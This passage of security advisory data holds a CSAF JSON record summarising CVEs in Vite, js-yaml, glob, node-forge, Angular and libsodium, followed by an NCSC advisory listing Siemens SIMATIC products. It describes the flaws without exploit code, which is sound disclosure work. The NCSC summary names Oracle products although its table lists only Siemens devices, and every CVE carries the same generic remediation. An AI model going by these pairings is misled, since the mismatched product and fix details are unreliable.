"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Vite is a frontend tooling framework for JavaScript. In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \\ when the dev server is running on Windows. Only apps explicitly exposing the Vite dev server to the network and running the dev server on Windows were affected. This issue has been patched in versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62522"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-62522"
},
{
"cve": "CVE-2025-64718",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"notes": [
{
"category": "summary",
"text": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it\u0027s possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64718"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/1321.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-64718"
},
{
"cve": "CVE-2025-64756",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64756"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-64756"
},
{
"cve": "CVE-2025-66030",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"notes": [
{
"category": "summary",
"text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Integer Overflow vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures containing OIDs with oversized arcs. These arcs may be decoded as smaller, trusted OIDs due to 32-bit bitwise truncation, enabling the bypass of downstream OID-based security decisions. This issue has been patched in version 1.3.2.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66030"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/190.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-66030"
},
{
"cve": "CVE-2025-66031",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "summary",
"text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Uncontrolled Recursion vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs. This issue has been patched in version 1.3.2.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66031"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/674.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-66031"
},
{
"cve": "CVE-2025-66035",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"notes": [
{
"category": "summary",
"text": "Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.16, 20.3.14, and 21.0.1, there is a XSRF token leakage via protocol-relative URLs in angular HTTP clients. The vulnerability is a Credential Leak by App Logic that leads to the unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token to an attacker-controlled domain. Angular\u0027s HttpClient has a built-in XSRF protection mechanism that works by checking if a request URL starts with a protocol (http:// or https://) to determine if it is cross-origin. If the URL starts with protocol-relative URL (//), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the X-XSRF-TOKEN header. This issue has been patched in versions 19.2.16, 20.3.14, and 21.0.1. A workaround for this issue involves avoiding using protocol-relative URLs (URLs starting with //) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single /) or fully qualified, trusted absolute URLs.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66035"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/201.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-66035"
},
{
"cve": "CVE-2025-66412",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 21.0.2, 20.3.15, and 19.2.17, A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. It occurs because the compiler\u0027s internal security schema is incomplete, allowing attackers to bypass Angular\u0027s built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain javascript: URLs) as requiring strict URL security, enabling the injection of malicious scripts. This vulnerability is fixed in 21.0.2, 20.3.15, and 19.2.17.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66412"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.0,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-66412"
},
{
"cve": "CVE-2025-69277",
"cwe": {
"id": "CWE-184",
"name": "Incomplete List of Disallowed Inputs"
},
"notes": [
{
"category": "summary",
"text": "libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren\u0027t in the main cryptographic group.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69277"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/184.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2025-69277"
},
{
"cve": "CVE-2026-22610",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0, a cross-site scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular\u2019s internal sanitization schema fails to recognize the href and xlink:href attributes of SVG \u003cscript\u003e elements as a Resource URL context. This issue has been patched in versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-0001"
]
},
"references": [
{
"category": "external",
"summary": "www.cve.org",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22610"
},
{
"category": "external",
"summary": "cwe.mitre.org",
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"category": "external",
"summary": "www.first.org",
"url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "Update to V4.0.800 or later version",
"product_ids": [
"CSAFPID-0001"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.0,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-0001"
]
}
],
"title": "CVE-2026-22610"
}
]
}
NCSC-2026-0079
Vulnerability from csaf_ncscnl - Published: 2026-03-10 12:39 - Updated: 2026-03-10 12:39Multiple vulnerabilities across Oracle products, including Utilities Application Framework, Fusion Middleware, and WebLogic Server, allow unauthenticated attackers to execute denial of service attacks, with CVSS scores of 7.5 and varying damage ratings.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
